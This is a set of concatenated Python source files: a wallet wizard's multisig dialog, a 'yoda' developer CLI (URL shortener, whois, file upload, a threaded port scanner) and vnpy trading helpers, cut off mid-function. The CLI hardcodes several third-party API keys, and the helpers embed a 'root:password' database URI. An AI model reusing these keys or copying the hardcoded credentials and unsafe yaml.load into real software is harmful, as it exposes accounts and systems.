    self.exec_layout(clayout.layout(), title)
    if clayout.selected_index() == 1:
        # Manual selection: show the full network-configuration layout.
        nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
        if self.exec_layout(nlayout.layout()):
            nlayout.accept()
            self.config.set_key('auto_connect', network.auto_connect, True)
    else:
        network.auto_connect = True
        self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
    """Let the user pick m-of-n parameters for a multisig wallet.

    Returns (m, n) with 1 <= m <= n and 2 <= n <= 15.
    """
    cw = CosignWidget(2, 2)
    m_edit = QSlider(Qt.Horizontal, self)
    n_edit = QSlider(Qt.Horizontal, self)
    n_edit.setMinimum(2)
    n_edit.setMaximum(15)
    m_edit.setMinimum(1)
    m_edit.setMaximum(2)
    n_edit.setValue(2)
    m_edit.setValue(2)
    n_label = QLabel()
    m_label = QLabel()
    grid = QGridLayout()
    grid.addWidget(n_label, 0, 0)
    grid.addWidget(n_edit, 0, 1)
    grid.addWidget(m_label, 1, 0)
    grid.addWidget(m_edit, 1, 1)
    def on_m(m):
        # backup_warning_label is created further down; these callbacks
        # only fire after the explicit on_n(2)/on_m(2) calls below.
        m_label.setText(_('Require {0} signatures').format(m))
        cw.set_m(m)
        backup_warning_label.setVisible(cw.m != cw.n)
    def on_n(n):
        n_label.setText(_('From {0} cosigners').format(n))
        cw.set_n(n)
        m_edit.setMaximum(n)  # m can never exceed n
        backup_warning_label.setVisible(cw.m != cw.n)
    n_edit.valueChanged.connect(on_n)
    m_edit.valueChanged.connect(on_m)
    vbox = QVBoxLayout()
    vbox.addWidget(cw)
    vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
    vbox.addLayout(grid)
    vbox.addSpacing(2 * char_width_in_lineedit())
    backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
                                     "you should include the master public key for each cosigner "
                                     "in all of your backups."))
    vbox.addWidget(backup_warning_label)
    # Initialise the labels/warning for the default 2-of-2 configuration.
    on_n(2)
    on_m(2)
    self.exec_layout(vbox, _("Multi-Signature Wallet"))
    m = int(m_edit.value())
    n = int(n_edit.value())
    return (m, n)
# ---- dev.py ----
from __future__ import absolute_import
from __future__ import division
import collections
import json
import re
import itertools
import string
import sys
from builtins import range
from builtins import str
from pydub import AudioSegment
from pydub.playback import play
from fuzzywuzzy import fuzz
import pyspeedtest
import os
import requests
import pandas as pd
from past.utils import old_div
from .util import *
from .alias import alias_checker
from .config import *
from resources.hackerearth.language import supported_languages
from resources.hackerearth.parameters import RunAPIParameters
from resources.hackerearth.api_handlers import HackerEarthAPI
from .ciphers import *
# NOTE(review): third-party API keys are hardcoded and committed to source;
# they are effectively public and should be rotated and loaded from
# environment/config instead.
FIREBASE_DYNAMIC_LINK_API_KEY = "AIzaSyAuVJ0zfUmacDG5Vie4Jl7_ercv6gSwebc"
GOOGLE_URL_SHORTENER_API_KEY = "AIzaSyCBAXe-kId9UwvOQ7M2cLYR7hyCpvfdr7w"
# Firebase Dynamic Links domain used by the URL shorten/expand commands.
domain = "yodacli.page.link"
HACKEREARTH_API_KEY = "0a7f0101e5cc06e4417a3addeb76164680ac83a4"
whois_base_url = "https://www.whois.com/whois/"
# Keybindings YAML config file and its containing folder.
KEYBINDINGS_CONFIG_FILE_PATH = get_config_file_paths()["KEYBINDINGS_CONFIG_FILE_PATH"]
KEYBINDINGS_CONFIG_FOLDER_PATH = get_folder_path_from_file_path(
    KEYBINDINGS_CONFIG_FILE_PATH
)
def get_software_file_path(software_name):
    """Return the path of the keybindings YAML file for *software_name*."""
    return "{}/{}.yaml".format(KEYBINDINGS_CONFIG_FOLDER_PATH, software_name)
def append_data_into_file(data, file_path):
    """Append *data* to the "entries" list of an existing YAML file.

    :param data: entry (dict) to append
    :param file_path: path to a YAML file that already contains an
        "entries" key
    """
    # read contents
    with open(file_path) as todays_tasks_entry:
        # safe_load: plain yaml.load() without an explicit Loader is
        # deprecated and can instantiate arbitrary objects from the file.
        contents = yaml.safe_load(todays_tasks_entry)
    contents["entries"].append(data)
    # enter data
    with open(file_path, "w") as todays_tasks_entry:
        yaml.dump(contents, todays_tasks_entry, default_flow_style=False)
@click.group()
def dev():
    # NOTE: click renders this docstring as the CLI help text; edit with care.
    """
    Dev command group:\n
    contains commands helpful for developers
    """
@dev.command()
def speedtest():
    """
    Run a speed test for your internet connection
    """
    # Delegates to the speedtest-cli executable expected on PATH.
    command = "speedtest-cli"
    os.system(command)
# code for URL command
def url_shorten(url_to_be_shortened):
    """
    Shorten a URL via the Firebase Dynamic Links API and echo the result.
    :param url_to_be_shortened:
    """
    endpoint = ("https://firebasedynamiclinks.googleapis.com/v1/shortLinks?key="
                + FIREBASE_DYNAMIC_LINK_API_KEY)
    payload = {
        "dynamicLinkInfo": {
            "dynamicLinkDomain": domain,
            "link": url_to_be_shortened,
        }
    }
    try:
        r = requests.post(
            endpoint,
            data=json.dumps(payload),
            headers={"Content-Type": "application/json"},
        )
    except requests.exceptions.ConnectionError:
        click.echo("Yoda cannot sense the internet right now!")
        sys.exit(1)
    data = r.json()
    response = "Here's your shortened URL:\n" + data["shortLink"]
    click.echo(response)
def url_expand(url_to_be_expanded):
    """
    Expand a previously shortened URL and echo the original.
    :param url_to_be_expanded:
    """
    endpoint = (
        "https://www.googleapis.com/urlshortener/v1/url?key="
        + GOOGLE_URL_SHORTENER_API_KEY
        + "&shortUrl="
        + url_to_be_expanded
    )
    try:
        r = requests.get(endpoint)
    except requests.exceptions.ConnectionError:
        click.echo("Yoda cannot sense the internet right now!")
        sys.exit(1)
    data = r.json()
    res = data["longUrl"]
    if domain in data["longUrl"]:
        # Dynamic links embed the target after "=": keep only that part.
        res = data["longUrl"].split("=")[1]
    response = "Here's your original URL:\n" + res
    click.echo(response)
def check_sub_command_url(action, url_to_be_expanded_or_shortened):
    """
    Dispatch the url sub-command ("shorten" / "expand") to its handler.
    :param action: sub-command name
    :param url_to_be_expanded_or_shortened: URL to operate on
    :return: whatever the handler returns, or None for an unknown command
    """
    sub_commands = {"shorten": url_shorten, "expand": url_expand}
    # Look up the handler before calling it, so a KeyError raised *inside*
    # the handler (e.g. a missing key in an API response) is no longer
    # misreported as an unknown command.
    try:
        handler = sub_commands[action]
    except KeyError:
        click.echo(chalk.red("Command does not exist!"))
        click.echo('Try "yoda url --help" for more info')
        return None
    return handler(url_to_be_expanded_or_shortened)
def add_keybindings(software, keybinding_filepath):
    """
    add/import key binding file
    :param software: software name; stored as <software>.yaml in the config dir
    :param keybinding_filepath: CSV file with rows of (action, key)
    """
    SOFTWARE_FILE_PATH = get_software_file_path(software)
    if not os.path.isfile(SOFTWARE_FILE_PATH):
        # Register the software in the master keybindings config first.
        if os.path.isfile(KEYBINDINGS_CONFIG_FILE_PATH):
            setup_data = dict(software=software, file=software + ".yaml")
            append_data_into_file(setup_data, KEYBINDINGS_CONFIG_FILE_PATH)
        else:
            setup_data = dict(
                entries=[dict(software=software, file=software + ".yaml")]
            )
            input_data(setup_data, KEYBINDINGS_CONFIG_FILE_PATH)
        try:
            # CSV columns: 0 = action, 1 = key (no header row)
            data = pd.read_csv(keybinding_filepath, header=None)
            with open(SOFTWARE_FILE_PATH, "w") as fin:
                entries = []
                for index, row in data.iterrows():
                    action = row[0]
                    _key = row[1]
                    entry = {"action": action, "key": _key}
                    entries.append(entry)
                setup_data = dict(entries=entries)
                input_data(setup_data, SOFTWARE_FILE_PATH)
        except Exception as e:
            # NOTE(review): broad catch — import failures are only printed,
            # leaving the software registered but without keybindings.
            print(e)
    else:
        click.echo(
            chalk.red(
                "Software's config file already exists. Type 'yoda dev keybindings --help'"
            )
        )
def search_keybindings(software, search_key):
    """
    search keybindings of *software* whose action fuzzy-matches *search_key*
    :param software: software name (selects the YAML file to search)
    :param search_key: action text to match (token-sort fuzzy ratio >= 50)
    """
    SOFTWARE_FILE_PATH = get_software_file_path(software)
    matched_keys = []
    matched_actions = []
    matched_keys_actions_pairs = []
    if os.path.isfile(SOFTWARE_FILE_PATH):
        with open(SOFTWARE_FILE_PATH) as fin:
            # NOTE(review): yaml.load without Loader= is deprecated;
            # prefer yaml.safe_load here.
            contents = yaml.load(fin)
            entries = contents["entries"]
            for entry in entries:
                act = entry["action"]
                key = entry["key"]
                # Fuzzy-match the action text; 50 is the accept threshold.
                ftsr = fuzz.token_sort_ratio(search_key, act)
                if ftsr >= 50:
                    matched_actions.append(act)
                    matched_keys.append(key)
        if matched_actions:
            matched_keys_actions_pairs = list(zip(matched_keys, matched_actions))
        ## Beautify matched output
        if matched_keys_actions_pairs:
            click.echo("Key Bindings:")
            click.echo("---------------------------------------")
            click.echo(" key | action ")
            click.echo("---------------|-----------------------")
            for key, act in matched_keys_actions_pairs:
                click.echo(" " + key + " | " + act)
        else:
            click.echo(chalk.red("No key matched, please try another option"))
    else:
        click.echo(
            chalk.red(
                "Software's config file doesn't exist. Type 'yoda dev keybindings --help'"
            )
        )
def check_sub_command_keybindings(action, software, fp_or_searchkey):
    """
    Dispatch the keybindings sub-command ("add" / "search") to its handler.
    :param action: sub-command name
    :param software: software whose keybindings are targeted
    :param fp_or_searchkey: CSV path (add) or search text (search)
    :return: whatever the handler returns, or None for an unknown command
    """
    sub_commands = {"add": add_keybindings, "search": search_keybindings}
    # Look up the handler before calling it, so a KeyError raised *inside*
    # the handler (e.g. a missing YAML key) is no longer misreported as an
    # unknown command.
    try:
        handler = sub_commands[action]
    except KeyError:
        click.echo(chalk.red("Command does not exist!"))
        click.echo('Try "yoda dev keybindings --help" for more info')
        return None
    return handler(software, fp_or_searchkey)
@dev.command()
@click.pass_context
@click.argument("input", nargs=1, required=False, callback=alias_checker)
@click.argument("url", nargs=1, required=False, callback=alias_checker)
def url(ctx, input, url):
    """
    URL shortener and expander\n\n
    Commands:
    shorten: to shorten the given URL
    expand: to expand shortened URL
    """
    # Resolve aliases, then hand the pair off to the sub-command dispatcher.
    input, url = get_arguments(ctx, 2)
    check_sub_command_url(str(input), str(url))
@dev.command()
def hackernews():
    """
    Hacker news top headlines
    """
    # NOTE(review): hardcoded newsapi.org API key committed to source —
    # should be rotated and loaded from config/env instead.
    _url = "https://newsapi.org/v2/everything?sources=hacker-news&apiKey=534594afc0d64a11819bb83ac1df4245"
    response = requests.get(_url)
    result = response.json()
    if result["status"] == "ok":
        for index, item in enumerate(result["articles"]):
            counter = "{}/{} \n".format((index + 1), len(result["articles"]))
            # Any of these article fields may be null in the API response.
            title = item["title"] or "No title"
            description = item["description"] or "No description"
            url = item["url"] or "No url"
            click.echo("News-- " + counter)
            click.echo("Title-- " + title)
            click.echo("Description-- " + description)
            click.echo("url-- " + url)
            click.echo()
            # Page through the articles one keypress at a time.
            click.echo('Continue? [press-"y"] ')
            c = click.getchar()
            click.echo()  # newline after news item
            if c != "y":
                break
    else:
        click.echo("Error in api")
@dev.command()
def coinflip():
    """
    Flips a coin and displays an outcome
    """
    import random
    # randint(1, 100) % 2 is 1 for odd draws ("Heads"), 0 for even ("Tails").
    outcome = "Heads" if random.randint(1, 100) % 2 == 1 else "Tails"
    click.echo(outcome)
@dev.command()
def portscan():
    """
    Scan open ports of a website,
    utilizing multi-threading to speed the task along
    """
    import threading
    import re
    is_py2 = sys.version[0] == "2"
    if is_py2:
        import Queue as queue
    else:
        import queue as queue
    def scanPortsTask(port):
        import socket
        # NOTE(review): this rebinding shadows the 'socket' module with a
        # socket instance for the rest of the function; it works, but a
        # different variable name would be clearer.
        socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.settimeout(1.0)
        try:
            socket.connect((targetForScan, port))
            with lock_output:
                click.echo("port:" + str(port) + " is open")
        except Exception as e:
            # Closed/filtered port (timeout or refusal) — silently skipped.
            pass
    def taskMaster():
        # Daemon worker: pulls port numbers off the queue until process exit.
        while True:
            port = port_queue.get()
            scanPortsTask(port)
            port_queue.task_done()
    lock_output = threading.Lock()
    port_queue = queue.Queue()
    targetForScan = input("Where scan ports, should I: ")
    # Crude hostname validation (e.g. example.com).
    pattern = "([\da-z\.-]+)\.([a-z\.]{2,6})$"
    if re.match(pattern, targetForScan):
        for x in range(200):  # 200 concurrent scanner threads
            t = threading.Thread(target=taskMaster)
            t.daemon = True
            t.start()
        for worker in range(1, 1000):  # scan ports 1..999
            port_queue.put(worker)
        port_queue.join()
    else:
        click.echo(
            "Find " + targetForScan + " I cannot, " + "sure spelled correctly, are you?"
        )
@dev.command()
@click.pass_context
@click.argument("ip_address", nargs=1, required=False, callback=alias_checker)
def iplookup(ctx, ip_address):
    """
    Find the geographical location of a given IP address.
    """
    ip_address = get_arguments(ctx, 1)
    if not ip_address:
        return click.echo(
            "Please supply an IP address as follows: $ yoda iplookup <ip_address>"
        )
    _ip_address = str(ip_address)
    import geoip2.database
    # Bundled MaxMind GeoLite2 database, located relative to the package.
    path = os.path.dirname(sys.modules["yoda"].__file__)
    path = os.path.join(path, "resources/databases/GeoLite2-City.mmdb")
    reader = geoip2.database.Reader(path)
    # NOTE(review): reader is never closed; consider closing it after use.
    response = reader.city(_ip_address)
    return click.echo(
        "{0}, {1}".format(
            response.subdivisions.most_specific.name, response.country.name
        )
    )
@dev.command()
@click.pass_context
@click.argument("link", nargs=1, required=True)
def checksite(ctx, link):
    """
    Check if website is up and running.
    """
    click.echo("Connecting...")
    # request
    try:
        response = requests.get(link)
    except requests.exceptions.ConnectionError:
        click.echo('Looks like {0} is not a valid URL, check the URL and try again.'.format(link))
        sys.exit(-1)
    # check the status code
    if response.status_code == 200:
        click.echo('Yay! The site is up and running! :)')
    else:
        click.echo("Uh-oh! Site is down. :'(")
        sys.exit(1)
@dev.command()
@click.pass_context
@click.argument("astrological_sign", nargs=1, required=False, callback=alias_checker)
def horoscope(ctx, astrological_sign):
    """
    Find the today's horoscope for the given astrological sign.
    """
    astrological_sign = get_arguments(ctx, 1)
    _astrological_sign = str(astrological_sign)  # NOTE(review): unused below
    try:
        r = requests.get(
            "http://horoscope-api.herokuapp.com/horoscope/today/{0}".format(
                astrological_sign
            )
        )
        return click.echo(r.json()["horoscope"])
    except requests.exceptions.ConnectionError:
        click.echo('Yoda cannot sense the internet right now!')
        sys.exit(-1)
# idea list process
@dev.command()
@click.argument("pattern", nargs=1)
@click.argument("path", nargs=1)
@click.option("-r", nargs=1, required=False, default=False)
@click.option("-i", nargs=1, required=False, default=False)
def grep(pattern, path, r, i):
    """
    Grep for a pattern in a file or recursively through a folder.
    yoda dev grep PATTERN PATH [OPTIONAL ARGUMENTS]
    """
    recursive, ignorecase = r, i
    if ignorecase:
        pattern = re.compile(pattern, flags=re.IGNORECASE)
    else:
        pattern = re.compile(pattern)
    if os.path.isfile(path):
        if recursive:
            click.echo(chalk.red("Cannot use recursive flag with a file name."))
            return
        with open(path, "r") as infile:
            for match in search_file(pattern, infile):
                click.echo(match, nl=False)
    else:
        # Directory: walk top-down; without -r, break after the first
        # (top-level) directory so only its immediate files are searched.
        for dirpath, dirnames, filenames in os.walk(path, topdown=True):
            for filename in filenames:
                with open(os.path.join(dirpath, filename), "r") as infile:
                    for match in search_file(pattern, infile):
                        click.echo(match, nl=False)
            if not recursive:
                break
@dev.command()
@click.pass_context
@click.argument("path", nargs=1, required=True)
@click.argument("start", nargs=1, required=False, default=0)
@click.argument("end", nargs=1, required=False, default=0)
def mp3cutter(ctx, path, start, end):
    """
    This command can be used to cut audio tracks right inside your terminal.
    yoda dev mp3cutter MUSIC_PATH START[default: 0] END[default:lenght of music]
    """
    click.echo("\nOpening file...")
    if not os.path.isfile(path):
        click.echo(
            chalk.red(
                "No file such as "
                + path
                + ", Please re-check the file path and try again."
            )
        )
        sys.exit(1)
    try:
        song = AudioSegment.from_mp3(path)
    except IndexError:
        click.echo(chalk.red("Wrong file format :'( "))
        sys.exit(1)
    # pydub measures length and slices in MILLISECONDS; the CLI arguments
    # are in seconds, so convert once and compare in a single unit.
    # (The previous version compared an endpoint in seconds against the
    # song length in milliseconds, so the bounds check almost never fired.)
    song_length_ms = len(song)
    start_ms = start * 1000
    # End defaults to the full length of the track when not supplied.
    end_ms = end * 1000 if end else song_length_ms
    if end_ms > song_length_ms:
        click.echo("Duh! Given endpoint is greater than lenght of music :'( ")
        sys.exit(1)
    if start_ms > end_ms:
        click.echo(
            "Given startpoint ({0}s) is greater than endpoint ({1}s) :/ ".format(
                start_ms / 1000, end_ms / 1000
            )
        )
        sys.exit(1)
    if start_ms > song_length_ms:
        click.echo(
            "Given startpoint ({0}s) is greater than the lenght of music ({1}s)".format(
                start_ms / 1000, song_length_ms / 1000
            )
        )
        sys.exit(1)
    # Report both bounds in seconds (previously mixed ms and seconds).
    click.echo("Cropping mp3 file from: " + str(start_ms / 1000) + "s to: " + str(end_ms / 1000) + "s")
    cropped_file_location = path.replace(".mp3", "_cropped.mp3")
    # cut the mp3 file
    song = song[start_ms:end_ms]
    # save
    song.export(cropped_file_location, format="mp3")
    click.echo("Yay!! Successfully cropped! :)\n")
    if click.confirm("Do you want to play the cropped mp3 file?"):
        play(song)
@dev.command()
@click.pass_context
@click.argument("domain", nargs=1, required=True)
def whois(ctx, domain):
    """
    Get the information about domains.
    """
    click.echo("Verifying domain...\n")
    data_obj = get_whois_data(domain)[0]
    if not "Domain" in data_obj:
        # whois.com shows no "Domain" row for unregistered names.
        click.echo("This domain has not been registered yet :/")
        sys.exit(1)
    # Data that we display
    labels = [
        "Domain",
        "Registrar",
        "Organization",
        "Country",
        "Registered On",
        "Expires On",
        "Updated On",
    ]
    for idx, label in enumerate(labels):
        # Eg: "Domain: Facebook.com"
        # Formula: Label + whitespace + value
        text_to_print = label + ":" + " " * (14 - len(label)) + data_obj[label]
        if idx == 3:
            # Blank line after "Country" to separate the two groups.
            text_to_print += "\n"
        click.echo(text_to_print)
def get_whois_data(domain):
    """Scrape whois.com for *domain*; return (data_dict, http_status)."""
    req = requests.get(whois_base_url + domain)
    soup = BeautifulSoup(req.text, "lxml")
    labels = soup.findAll("div", attrs={"class": "df-label"})
    values = soup.findAll("div", attrs={"class": "df-value"})
    # Pair each label div with the value div at the same position.
    data_obj = {}
    for position, label in enumerate(labels):
        data_obj[clean_soup_data(label)] = clean_soup_data(values[position])
    return data_obj, req.status_code
@dev.command()
@click.pass_context
@click.argument("path", nargs=1, required=True)
def fileshare(ctx, path):
    """
    Upload and share files using https://file.io.
    """
    if not os.path.isfile(path):
        click.echo(chalk.red("No file such as " + path + ", Please re-check the PATH and try again."))
        sys.exit(-1)
    # Close the file handle after the upload (previous version leaked it).
    with open(path, 'rb') as file_handle:
        resp = requests.post('https://file.io', files={'file': file_handle})
    response_json = json.loads(resp.text)
    if 'link' in response_json.keys():
        click.echo(chalk.green("File Link : " + response_json['link']))
        click.echo(chalk.yellow("WARNING: File will be deleted after it is accessed once."))
    else:
        click.echo(chalk.red("File upload failed!"))
        sys.exit(1)
@dev.command()
@click.pass_context
@click.argument("input", nargs=1, required=True, callback=alias_checker)
@click.argument("software", nargs=1, required=False, callback=alias_checker)
@click.argument("fp_or_searchkey", nargs=1, required=False, callback=alias_checker)
def keybindings(ctx, input, software, fp_or_searchkey):
    """
    This command can be used to save or search keybindings for different softwares.
    yoda dev keybindings INPUT[add,search] SOFTWARE_NAME[default: None] FILE_TO_ADD_OR_ACTION_TO_SEARCH[default:None]
    """
    input, software, fp_or_searchkey = get_arguments(ctx, 3)
    # Make sure the config folder exists before any handler touches it.
    create_folder(KEYBINDINGS_CONFIG_FOLDER_PATH)
    check_sub_command_keybindings(str(input), str(software), str(fp_or_searchkey))
def search_file(pattern, infile):
    """Yield every line of *infile* that matches the compiled *pattern*."""
    return (candidate for candidate in infile if pattern.search(candidate))
@dev.command()
@click.pass_context
@click.argument('mode', nargs=1, required=False, callback=alias_checker)
def ciphers(ctx, mode):
    """
    Encrypts and decrypts texts in classical ciphers
    """
    mode = get_arguments(ctx, 1)
    if mode is None:
        click.echo("No mode was passed.(choose encrypt or decrypt")
        return
    _mode = str(mode).lower()
    # Available ciphers keyed by display name; dicts preserve insertion
    # order, so the printed menu numbers map 1:1 onto cipher_names below.
    cipher_dict = {
        "Atbash": atbash.AtbashCipher,
        "Caesar": caesar.CaesarCipher,
        "ROT13": rot13.ROT13Cipher
    }
    cipher_names = list(cipher_dict.keys())
    for index, cipher_name in enumerate(cipher_names):
        print("{0}: {1}".format(index, cipher_name))
    # Guard the conversion: int() on e.g. "abc" raised an unhandled
    # ValueError in the old code.
    try:
        cipher_choice = int(click.prompt("Choose a cipher"))
    except ValueError:
        click.echo("Invalid cipher number was chosen.")
        return
    if cipher_choice > len(cipher_dict) - 1 or cipher_choice < 0:
        click.echo("Invalid cipher number was chosen.")
        return
    cipher = cipher_dict[cipher_names[cipher_choice]]()
    if _mode == "encrypt":
        clear_text = click.prompt("The text you want to encrypt")
        return click.echo(cipher.encrypt(clear_text))
    elif _mode == "decrypt":
        cipher_text = click.prompt("The text you want to decrypt")
        return click.echo(cipher.decrypt(cipher_text))
    else:
        return click.echo("Invalid mode passed.")
@dev.command()
@click.pass_context
@click.argument("path", nargs=1, required=True)
def run(ctx, path):
    """
    Compile and run code without a local compiler.
    """
    if os.path.isfile(path):
        # Context manager guarantees the handle is closed (the old
        # open(path).read() leaked the file object).
        with open(path, "r") as source_file:
            source = source_file.read()
        # Guard the split: a path without "." raised IndexError before;
        # an empty extension now falls through to "Unsupported language".
        file_extension = path.rsplit(".", 1)[1] if "." in path else ""
        if file_extension not in supported_languages.keys():
            click.echo(chalk.red("Sorry, Unsupported language."))
            sys.exit(-1)
        lang = supported_languages[file_extension]
        # API request flags (semantics defined by the HackerEarth API).
        compressed = 1
        html = 0
        params = RunAPIParameters(
            client_secret=HACKEREARTH_API_KEY,
            source=source,
            lang=lang,
            compressed=compressed,
            html=html,
        )
        api = HackerEarthAPI(params)
        click.echo(chalk.yellow("Compiling code.."))
        r = api.compile()
        click.echo(chalk.cyan("Running code..."))
        r = api.run()
        output = r.__dict__.get("output")
        click.echo(chalk.green("Output:"))
        click.echo(output)
        click.echo("Link: " + r.__dict__.get("web_link"))
    else:
        click.echo(
            chalk.red(
                "No file such as "
                + path
                + ", Please re-check the file path and try again."
            )
        )
        sys.exit(1)
|
vtFunction.py | # encoding: UTF-8
"""
包含一些开发中常用的函数
"""
import os
import decimal
import json
import datetime as dt
import time
from datetime import datetime,time
import threading
import multiprocessing.pool
import functools
from math import isnan
MAX_NUMBER = 10000000000000  # values above this (or NaN) are treated as interface noise
MAX_DECIMAL = 4              # maximum decimal places kept for floats
#----------------------------------------------------------------------
def safeUnicode(value):
    """Sanitize a value coming from a trading interface and return it as text.

    Guards against two artefacts seen in interface data:
    1. numbers exceeding MAX_NUMBER, or NaN (the interface emits these
       for values near zero) — normalised to 0;
    2. floats carrying more than MAX_DECIMAL decimal places — rounded.
    """
    # Clamp out-of-range numbers / NaN produced by the interface.
    if type(value) is int or type(value) is float:
        if value > MAX_NUMBER or isnan(value):
            value = 0
    # Limit the number of decimal places.
    if type(value) is float:
        d = decimal.Decimal(str(value))
        if abs(d.as_tuple().exponent) > MAX_DECIMAL:
            value = round(value, ndigits=MAX_DECIMAL)
    try:
        # Python 2: this module historically returned unicode objects.
        return unicode(value)
    except NameError:
        # Python 3: unicode was merged into str (the old code raised
        # NameError here).
        return str(value)
# Icon path lookup table: maps an .ico file name to its absolute path,
# built once at import time by scanning this module's directory tree.
iconPathDict = {}
path = os.path.abspath(os.path.dirname(__file__))
for root, subdirs, files in os.walk(path):
    iconPathDict.update(
        (fileName, os.path.join(root, fileName))
        for fileName in files
        if '.ico' in fileName
    )
#----------------------------------------------------------------------
def loadIconPath(iconName):
    """Return the absolute path of icon *iconName*, or '' when unknown."""
    global iconPathDict
    return iconPathDict.get(iconName, '')
#----------------------------------------------------------------------
def getTempPath(name):
    """Return the path of *name* inside the 'temp' folder under the current
    working directory, creating that folder on first use."""
    tempFolder = os.path.join(os.getcwd(), 'temp')
    if not os.path.exists(tempFolder):
        os.makedirs(tempFolder)
    return os.path.join(tempFolder, name)
# JSON configuration file paths, cached by file name.
jsonPathDict = {}
#----------------------------------------------------------------------
def getJsonPath(name, moduleFile):
    """
    Locate the JSON configuration file *name*:
    1. look in the current working directory first;
    2. otherwise fall back to the directory of *moduleFile*
       (the caller's __file__).

    The resolved path is cached in jsonPathDict either way.
    """
    currentFolder = os.getcwd()
    currentJsonPath = os.path.join(currentFolder, name)
    if os.path.isfile(currentJsonPath):
        jsonPathDict[name] = currentJsonPath
        return currentJsonPath
    moduleFolder = os.path.abspath(os.path.dirname(moduleFile))
    # Join directly -- the old os.path.join(moduleFolder, '.', name)
    # inserted a spurious '/./' component into the returned path.
    moduleJsonPath = os.path.join(moduleFolder, name)
    jsonPathDict[name] = moduleJsonPath
    return moduleJsonPath
vtGlobalSetting = None  # module-level cache of the parsed VT_setting.json
#----------------------------------------------------------------------
def loadMongoSetting():
    """Load the MongoDB configuration (parsed once, then cached).

    Reads VT_setting.json, probes the primary mongoHost and falls back
    to mongoHost1 when the primary is unreachable.

    :return: tuple (host_uri, port, logging_flag)
    """
    global vtGlobalSetting
    setting = vtGlobalSetting
    if setting is None:  # identity test, not '== None'
        fileName = 'VT_setting.json'
        filePath = getJsonPath(fileName, __file__)
        # Context manager closes the handle (the old code leaked it).
        with open(filePath) as f:
            setting = json.load(f)
        # Probe availability; switch to the backup host when the primary
        # does not answer within the selection timeout.
        from pymongo.errors import ConnectionFailure
        import pymongo
        try:
            # NOTE(review): credentials are hard-coded into the URI; they
            # should come from the settings file or the environment.
            uri = 'mongodb://root:password@' + setting['mongoHost'] + ':' + str(setting['mongoPort']) + '/?serverSelectionTimeoutMS=200'
            client = pymongo.MongoClient(uri, connect=False)
            client.admin.command('ismaster')
        except ConnectionFailure:
            setting['mongoHost'] = setting['mongoHost1']
            print("Default Mongo server not available, use backup Server ")
        vtGlobalSetting = setting
    host = 'mongodb://root:password@' + setting['mongoHost']
    port = setting['mongoPort']
    logging = setting['mongoLogging']
    return host, port, logging
#----------------------------------------------------------------------
def todayDate():
    """Return the local machine's current date as a datetime at midnight."""
    now = datetime.now()
    return datetime(now.year, now.month, now.day)
# from vnpy.trader.timeout_decorate import timeout
# def setInterval(interval):
# def decorator(function):
# def wrapper(*args, **kwargs):
# stopped = threading.Event()
# def loop(): # executed in another thread
# while not stopped.wait(interval): # until stopped
# #function(*args, **kwargs)
# try:
# timeout(interval,False)(function)(*args,**kwargs)
# except :
# pass
# else:
# pass
# t = threading.Thread(target=loop)
# t.daemon = True # stop if the program exits
# t.start()
# return stopped
# return wrapper
# return decorator
class RemoteSetting(object):
    """RPC service engine settings: resolves the reply/publish bind
    addresses for the RPC server from RS_setting.json."""

    # Settings file resolved (cwd first, then module dir) at class-definition time.
    settingFileName = 'RS_setting.json'
    settingFilePath = getJsonPath(settingFileName, __file__)

    name = u'RPC服务'

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor: derive the local host from the MongoDB URI, then load the addresses."""
        host,port,log = loadMongoSetting()
        # Strip the 'mongodb://user:pass@' prefix, keeping only the host part.
        self.host = host[host.find('@')+1:]
        if not self.host:
            # No '@' found (or empty remainder): use the URI as-is.
            self.host = host
        self.loadSetting()

    #----------------------------------------------------------------------
    def loadSetting(self):
        """Read the reply/publish addresses, substituting '*' with the local host."""
        with open(self.settingFilePath) as f:
            d = json.load(f)
            self.repAddress = d['repAddress'].replace('*',self.host)
            self.pubAddress = d['pubAddress'].replace('*',self.host)
#-------------------------------------------------------------------------------------------------------
#国内正规期货市场交易时间为周一至周五早上9点到11点半,下午1点半到15点结束。 早上10:15到10:30休息15分钟,夜盘:21点到日凌晨2:30分。
def isRecordingTime(dt, DAY_START=time(8, 30), DAY_END=time(15, 18), NIGHT_START=time(20, 30), NIGHT_END=time(2, 33)):
    """Return True while tick recording should be active.

    Covers the day session plus the night session that wraps past
    midnight, and excludes weekends (Saturday after the night session
    ends, and all of Sunday).
    """
    currentTime = dt.time()
    inDaySession = DAY_START <= currentTime <= DAY_END
    # The night session wraps midnight, hence the 'or'.
    inNightSession = currentTime >= NIGHT_START or currentTime <= NIGHT_END
    recording = inDaySession or inNightSession
    # Weekend filter: isoweekday() is 6 for Saturday, 7 for Sunday.
    weekday = dt.isoweekday()
    if weekday == 7 or (weekday == 6 and currentTime > NIGHT_END):
        recording = False
    return recording
#-------------------------------------------------------------------------------------------------------
def isNotTradingTime(time,timeRanges=[
(datetime.strptime("02:30:00", "%H:%M:%S").time(), datetime.strptime("08:59:59", "%H:%M:%S").time()), #night rest
(datetime.strptime("10:15:00", "%H:%M:%S").time(), datetime.strptime("10:29:59", "%H:%M:%S").time()), #morning rest
(datetime.strptime("11:30:00", "%H:%M:%S").time(), datetime.strptime("13:29:59", "%H:%M:%S").time()), #day rest
(datetime.strptime("15:00:00", "%H:%M:%S").time(), datetime.strptime("20:59:59", "%H:%M:%S").time()), #afternoon rest
]):
for tr in timeRanges:
if tr[0] <= time <= tr[1]:
return True
return False
pass
def isTradingTime(time):
    """Return True when *time* is inside a trading session
    (the complement of isNotTradingTime)."""
    return not isNotTradingTime(time)
# def isTradingTime(time,timeRanges=[
# (datetime.strptime("09:00:00", "%H:%M:%S").time(), datetime.strptime("10:15:00", "%H:%M:%S").time()),
# (datetime.strptime("10:30:00", "%H:%M:%S").time(), datetime.strptime("11:30:00", "%H:%M:%S").time()),
# (datetime.strptime("13:30:00", "%H:%M:%S").time(), datetime.strptime("15:00:00", "%H:%M:%S").time()),
# (datetime.strptime("21:00:00", "%H:%M:%S").time(), datetime.strptime("23:00:00", "%H:%M:%S").time())
# ]):
# for tr in timeRanges:
# # [)
# if tr[0] <= time < tr[1]:
# return True
# return False
# pass
#########################################################################
def timeit(method):
